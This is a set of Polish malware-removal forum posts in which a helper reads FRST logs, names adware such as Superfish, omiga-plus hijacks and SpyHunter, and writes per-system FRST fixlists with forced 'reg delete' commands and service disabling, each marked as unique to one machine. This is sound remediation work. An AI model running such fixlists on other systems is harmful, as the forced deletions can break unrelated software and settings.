/url=http:/cdn.buildomserv.com/txt/@CAMPID@/@VER@/file.txt /appid=73143 /taskname=quiz_games_updating_service /funurl=http:/stats.buildomserv.com FF Plugin: @staging.google.com/globalUpdate Update;version=10 -> C:\Program Files\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll [2014-07-27] (globalUpdate) FF Plugin: @staging.google.com/globalUpdate Update;version=4 -> C:\Program Files\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll [2014-07-27] (globalUpdate) FF HKLM\...\Firefox\Extensions: [{3f963a5b-e555-4543-90e2-c3908898db71}] - C:\Program Files\AVG\AVG9\Firefox FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://alawar.pl HKU\S-1-5-21-823518204-688789844-682003330-500\Software\Microsoft\Internet Explorer\Main,Start Page = http://alawar.pl Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - No File [] DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab CustomCLSID: HKU\S-1-5-21-823518204-688789844-682003330-500_Classes\CLSID\{D70E31AD-2614-49F2-B0FC-ACA781D81F3E}\localserver32 -> G:\Mechanical 2012 z Mechanical Desktop\zainstalowane\AutoCAD Mechanical 2012\acad.exe No File HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot => "AlternateShell"="" C:\Documents and Settings\All Users\Dane aplikacji\TEMP C:\Documents and Settings\Administrator\Dane aplikacji\EEYUapomOpv0Nife C:\Documents and Settings\Administrator\Dane aplikacji\f80X2gBVs5F0Egckh C:\Documents and Settings\Administrator\Dane aplikacji\kXw3rrWBcGOcmQKPdKY C:\Documents and Settings\Administrator\Dane aplikacji\ZwwMw8rLRrMZg C:\Documents and Settings\Administrator\Ustawienia lokalne\Dane aplikacji\quiz games C:\Program Files\globalUpdate C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension C:\WINDOWS\system32\029B560A371F4E00AB32838EBC01B9E7 Folder: C:\Program Files\Mozilla Firefox Folder: C:\Program Files\Opera Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f EmptyTemp:

Objawy wskazują na Tryb PIO, proszę o zrzuty ekranu pokazujące: urządzenia posortowane wg połączeń, by było widać gdzie jest podpięty dysk twardy oraz właściwości kanału na którym jest dysk.

Brakuje jeszcze skanu:

Tak jest, wszystko się zgadza, te pliki mają dokładnie zawartość którą zgłosiłam już. Przechodzimy do dalszych czynności: 1. Uruchom AdwCleaner. Na razie wybierz tylko i wyłącznie opcję Szukaj (nic nie usuwaj) i dostarcz log wynikowy z folderu C:\AdwCleaner. 2. Następnie zrób test z tzw. awaryjnym startem Firefox: Za bardzo się śpieszysz z instalacjami rozszerzeń do Firefox podczas gdy leczenie jest nadal w toku, co zaciemnia sprawę. Dużo manipulacji tu było, np. instalacja staroci wmpfirefoxplugin.exe (to chyba już nawet nie działa) oraz dodanie bogatej kolekcji rozszerzeń. Nie jest wykluczone, że któryś z dodanych add-onów ma jakiś bug. FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_17_0_0_134.dll [2015-03-20] () FF Plugin: @java.com/DTPlugin,version=11.40.2 -> C:\Program Files\Java\jre1.8.0_40\bin\dtplugin\npDeployJava1.dll [2015-04-07] (Oracle Corporation) FF Plugin: @java.com/JavaPlugin,version=11.40.2 -> C:\Program Files\Java\jre1.8.0_40\bin\plugin2\npjp2.dll [2015-04-07] (Oracle Corporation) FF Plugin: @microsoft.com/GENUINE -> disabled No File FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation) FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_17_0_0_134.dll [2015-03-20] () FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1205146.dll [2013-10-25] (Adobe Systems, Inc.) FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2014-05-21] (Microsoft Corporation) FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-22] (Microsoft Corporation) FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-04-04] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-04-04] (Google Inc.) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2014-09-04] (Adobe Systems Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\np-mswmp.dll [2007-04-10] (Microsoft Corporation) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2014-05-21] (Microsoft Corporation) FF Extension: MinimizeToTray revived (MinTrayR) - C:\Users\Bambamdilla\AppData\Roaming\Mozilla\Firefox\Profiles\nhn9no4i.default-1428342958556\Extensions\mintrayr@tn123.ath.cx [2015-04-07] FF Extension: Eliminator Slajdów - C:\Users\Bambamdilla\AppData\Roaming\Mozilla\Firefox\Profiles\nhn9no4i.default-1428342958556\Extensions\jid0-GaZOxvWNYcafEsmayJDIG3XXVi8@jetpack.xpi [2015-04-07] FF Extension: Secure Login - C:\Users\Bambamdilla\AppData\Roaming\Mozilla\Firefox\Profiles\nhn9no4i.default-1428342958556\Extensions\secureLogin@blueimp.net.xpi [2015-04-07] FF Extension: Session Manager - C:\Users\Bambamdilla\AppData\Roaming\Mozilla\Firefox\Profiles\nhn9no4i.default-1428342958556\Extensions\{1280606b-2510-4fe0-97ef-9b5a22eafe30}.xpi [2015-04-07] FF Extension: Download Status Bar - C:\Users\Bambamdilla\AppData\Roaming\Mozilla\Firefox\Profiles\nhn9no4i.default-1428342958556\Extensions\{6c28e999-e900-4635-a39d-b1ec90ba0c0f}.xpi [2015-04-07] FF Extension: ReloadEvery - C:\Users\Bambamdilla\AppData\Roaming\Mozilla\Firefox\Profiles\nhn9no4i.default-1428342958556\Extensions\{888d99e7-e8b5-46a3-851e-1ec45da1e644}.xpi [2015-04-07] FF Extension: Password Exporter - C:\Users\Bambamdilla\AppData\Roaming\Mozilla\Firefox\Profiles\nhn9no4i.default-1428342958556\Extensions\{B17C1C5A-04B1-11DB-9804-B622A1EF5492}.xpi [2015-04-07] FF Extension: SoundCloud Downloader - Technowise - C:\Users\Bambamdilla\AppData\Roaming\Mozilla\Firefox\Profiles\nhn9no4i.default-1428342958556\Extensions\{c8d3bc80-0810-4d21-a2c2-be5f2b2832ac}.xpi [2015-04-07] FF Extension: Adblock Plus - C:\Users\Bambamdilla\AppData\Roaming\Mozilla\Firefox\Profiles\nhn9no4i.default-1428342958556\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2015-04-07] Wyłącz Firefox i upewnij się, że nie działa jego proces w tle. Następnie klawisz z flagą Windows + R i wklej komendę: "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" -safe-mode Podaj rezultaty czy Firefox w takim stadium też wykłada się na otwieraniu nowej karty. Jeśli się okaże, że problem nie występuje, będziemy dokładniej analizować sprawę oraz obcinać zbędne / przedatowane wtyczki.

Nie skończyliśmy jeszcze. Na razie proszę o dostarczenie pliku Fixlog.txt z wynikami ostatniej akcji. Jest to potrzebne by potwierdzić zawartość tych plików, gdyż już zgłosiłam to do detekcji FRST. Na wszelki wypadek dodaj nowy log FRST z opcji Scan (bez Addition i Shortcut).

Tak, jest tu adware ... głównie od Lenovo! Tzn. inwazyjne śmieci Lenovo Browser Guard i Superfish Inc. VisualDiscovery, przy czym ten drugi wygląda na wstępnie czymś potraktowany. Jest też zestaw wątpliwej reputacji Pokki do emulowania Menu Start. Akcje wstępne: 1. Deinstalacje: - Odinstaluj adware/PUP: ClickMovie1-Downloaderv10, FreeTVDownloader, Host App Service, Lenovo Browser Guard, QuickStores-Toolbar 1.1.0, Superfish Inc. VisualDiscovery, Start Menu. - Dodatkowo zastosuj usuwacz firmowy, by pozbyć się też szkodliwego certyfikatu Superfish: KLIK. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {36FBF9F7-0174-4757-BF5C-29DD8E248DF9} - \Optimize Start Menu Cache Files-S-1-5-21-731859526-1970873617-1409082529-500 No Task File Task: {3A2D448C-77E5-4EBD-9852-72A9C590F8BF} - System32\Tasks\{9C226673-D1B6-4B7A-AE66-F8F1B4066F03} => pcalua.exe -a "G:\Gry\EA Sports\FIFA 15\Origin.Games.Reg.Tools.v1.0-3DM.exe" -d "G:\Gry\EA Sports\FIFA 15" Task: {9309E774-C705-49BB-A917-A93C7110809E} - System32\Tasks\{41FA8DF1-EB0D-49C4-8029-0295ABAAEBE0} => pcalua.exe -a E:\Driver\DrvInstall.exe -d E:\Driver BootExecute: autocheck autochk * HKLM\...\Run: [Nvtmru] => "C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\VDWFP => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\VisualDiscovery => ""="service" CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - G:\Programy\Avast\WebRep\Chrome\aswWebRepChromeSp.crx [2015-03-17] ShortcutWithArgument: C:\Users\Karol\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://isearch.omiga-plus.com/?type=sc&ts=1423510967&from=ild&uid=ST1000LM014-SSHD-8GB_W382F8C6XXXXW382F8C6 SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-731859526-1970873617-1409082529-1002 -> DefaultScope {DA2C15E7-016A-4D6C-9E63-4966CB85B99B} URL = http://isearch.omiga-plus.com/web/?utm_source=b&utm_medium=ild&utm_campaign=install_ie&utm_content=ds&from=ild&uid=ST1000LM014-SSHD-8GB_W382F8C6XXXXW382F8C6&ts=1423510994&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-731859526-1970873617-1409082529-1002 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://isearch.omiga-plus.com/web/?utm_source=b&utm_medium=ild&utm_campaign=install_ie&utm_content=ds&from=ild&uid=ST1000LM014-SSHD-8GB_W382F8C6XXXXW382F8C6&ts=1423510994&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-731859526-1970873617-1409082529-1002 -> {2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0} URL = http://isearch.omiga-plus.com/web/?utm_source=b&utm_medium=ild&utm_campaign=install_ie&utm_content=ds&from=ild&uid=ST1000LM014-SSHD-8GB_W382F8C6XXXXW382F8C6&ts=1423510994&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-731859526-1970873617-1409082529-1002 -> {4BC32F25-FA4A-4EB7-83F1-A4DC8DC7781B} URL = http://www.search.ask.com/web?tpid=SPC-SP&o=APN10951&pf=V7&p2=^B20^YYYYYY^YY^PL&gct=&itbv=12.24.1.271&apn_uid=61ABFAB9-F9D2-400A-8967-5B1B8E148977&apn_ptnrs=^B20&apn_dtid=^YYYYYY^YY^PL&apn_dbr=cr_41.0.2272.76&doi=2015-03-04&trgb=IE&q={searchTerms}&psv=&pt=tb SearchScopes: HKU\S-1-5-21-731859526-1970873617-1409082529-1002 -> {DA2C15E7-016A-4D6C-9E63-4966CB85B99B} URL = http://isearch.omiga-plus.com/web/?utm_source=b&utm_medium=ild&utm_campaign=install_ie&utm_content=ds&from=ild&uid=ST1000LM014-SSHD-8GB_W382F8C6XXXXW382F8C6&ts=1423510994&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-731859526-1970873617-1409082529-1002 -> {E733165D-CBCF-4FDA-883E-ADEF965B476C} URL = http://isearch.omiga-plus.com/web/?utm_source=b&utm_medium=ild&utm_campaign=install_ie&utm_content=ds&from=ild&uid=ST1000LM014-SSHD-8GB_W382F8C6XXXXW382F8C6&ts=1423510994&type=default&q={searchTerms} StartMenuInternet: IEXPLORE.EXE - iexplore.exe HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com C:\ProgramData\APN C:\Users\Karol\AppData\Roaming\KB8888239.log C:\Users\Karol\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\QuickStores.url C:\Users\Karol\AppData\Roaming\Microsoft\Windows\Start Menu\QuickStores.url EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 4. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa raporty. Dołącz też plik fixlog.txt. Wypowiedz się czy nadal są problemy.

Tu już był użytkownik, który kombinował za pomocą Revo i podobnych, a wystarczyło odpalić ten skrót: KLIK. Jaki jest problem przy uruchomieniu tego sktóru? ShortcutWithArgument: C:\Users\Piotr\Start Menu\Programs\SpyHunter\Uninstall.lnk -> C:\Users\Piotr\AppData\Roaming\Enigma Software Group\sh_installer.exe (Enigma Software Group USA, LLC.) -> -r sh Na razie zadaję deaktywację komponentów SpyHunter, by się nie uruchamiał, bo dążę cały czas do poprawnej deinstalacji. Przy okazji i inne działania poboczne (szczątki adware, wpisy puste). 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: DisableService: esgiguard DisableService: EsgScanner DisableService: SpyHunter 4 Service Task: {59E9AA31-A9CA-4225-9158-17572A448C92} - System32\Tasks\SpyHunter4Startup => C:\Program Files\Enigma Software Group\SpyHunter\Spyhunter4.exe [2015-01-19] (Enigma Software Group USA, LLC.) S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X] S2 sbapifs; system32\DRIVERS\sbapifs.sys [X] Winlogon\Notify\igfxcui: igfxdev.dll [X] HKU\S-1-5-21-394100221-3083635422-585930115-1001\Software\Classes\.exe: exefile => HKU\S-1-5-21-394100221-3083635422-585930115-1001\Software\Classes\exefile: GroupPolicy: Group Policy on Chrome detected CHR HKLM\SOFTWARE\Policies\Google: Policy restriction HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction HKU\S-1-5-21-394100221-3083635422-585930115-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSE1 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSE1 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com URLSearchHook: [s-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133] ATTENTION ==> Default URLSearchHook is missing. StartMenuInternet: IEXPLORE.EXE - iexplore.exe C:\Program Files (x86)\DiscountEexttensi C:\Program Files (x86)\SocialReviver C:\Program Files (x86)\unnisaless C:\Program Files (x86)\Opera C:\ProgramData\{6aa8b13e-f10a-3559-6aa8-8b13ef10c4fb} C:\ProgramData\Malwarebytes C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk C:\Users\Piotr\AppData\Local\Opera Software C:\Users\Piotr\AppData\Roaming\Opera Software Reg: reg delete HKCU\Software\Google /f Reg: reg delete HKLM\SOFTWARE\Google /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt.

Do wykonania następujące działania: 1. W Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj Tilt the ball 3D. Powód: rozszerzenie zostało usunięte z Google Chrome Web Store (albo niekompatybilne, albo niepożądane integracje). Ustawienia > karta Ustawienia > Po uruchomieniu > Otwórz konkretną stronę lub zestaw stron > usuń adresy delta-search.com, isearch.avg.com, mail.ru, search.babylon.com i przestaw na "Otwórz stronę nowej karty". 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-2873684722-1015400582-2217056914-1001\...\Run: [GoogleChromeAutoLaunch_3F2E34BF7A244698209604940BA7FE5B] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [809288 2015-03-30] (Google Inc.) HKU\S-1-5-21-2873684722-1015400582-2217056914-1001\...\Run: [Akamai NetSession Interface] => "C:\Users\Damian\AppData\Local\Akamai\netsession_win.exe" HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = HKU\S-1-5-21-2873684722-1015400582-2217056914-1001\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.pl/?gfe_rd=cr&ei=2HRIU7XYNKmF8QezhoCQAw Task: {1BE3BB09-3F87-460F-B160-8221A912BDC7} - System32\Tasks\WinThruster => C:\Program Files (x86)\WinThruster\WinThruster.exe Task: {5C061339-90D9-427D-9383-1CD4D22ABA07} - System32\Tasks\{B5DECAF9-5798-4926-AB4D-92D5B22E2A3E} => pcalua.exe -a "C:\Drivers\Touchpad Driver (Synaptics, Elan)\Setup.exe" -d "C:\Drivers\Touchpad Driver (Synaptics, Elan)" Task: {97F31393-1EA3-4B89-8300-54EC9775B6E2} - System32\Tasks\WinThruster_DEFAULT => C:\Program Files (x86)\WinThruster\WinThruster.exe Task: {9E182976-D88B-4FFB-AA53-62DEDF03C580} - System32\Tasks\WinThruster_UPDATES => C:\Program Files (x86)\WinThruster\WinThruster.exe Task: C:\Windows\Tasks\WinThruster_DEFAULT.job => C:\Program Files (x86)\WinThruster\WinThruster.exe Task: C:\Windows\Tasks\WinThruster_UPDATES.job => C:\Program Files (x86)\WinThruster\WinThruster.exe S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X] R3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X] S4 pccsmcfd; \SystemRoot\system32\DRIVERS\pccsmcfdx64.sys [X] C:\ProgramData\Malwarebytes C:\Users\Damian\AppData\Roaming\Solvusoft C:\Windows\system32\roboot64.exe Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v Overwolf /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt.

Temat przenoszę do działu Windows. Brak oznak czynnej infekcji. 1. Podstawowy defekt, który może tworzyć wszystkie omawiane problemy (a szczególnie mulenie i spadek wydajności), to krytyczny poziom wolnego miejsca na dysku, nieco ponad 3GB wolnego i nie wiadomo jak bardzo sfragmentowany ten skrawek jest (im bardziej = tym trudniej)! Zacznij od porządków na dysku, by uzyskać o wiele większy zakres wolnego. Ta partycja jest ogólnie mała i tu mogą być wieczne problemy z wolnym miejscem. ==================== Drives ================================ Drive c: () (Fixed) (Total:40.78 GB) (Free:3.46 GB) NTFS ==>[Drive with boot components (obtained from BCD)] 2. Ten błąd explorer.exe (enigmatycznie przedstawiony w Dzienniku zdarzeń) może być też z winy niekompatybilnych rozszerzeń powłoki. Jeśli punkt 1 nic nie wniesie do sprawy, wykonaj test pod kątem rozszerzeń powłoki. Uruchom ShellExView x64, przez klik w belkę Company posortuj wspólnie wszustkie niedomyślne wpisy (wyróżnione na różowym tle), z wciśniętym CTRL zaznacz wszystkie różowe i wyłącz, zresetuj system. Sprawdź czy są jakieś zmiany. 3. Przy okazji odinstaluj stary Bing Bar. Odpadną określone procesy. Oraz wykonaj poboczne akcje "kosmetyczne" ze spoilera: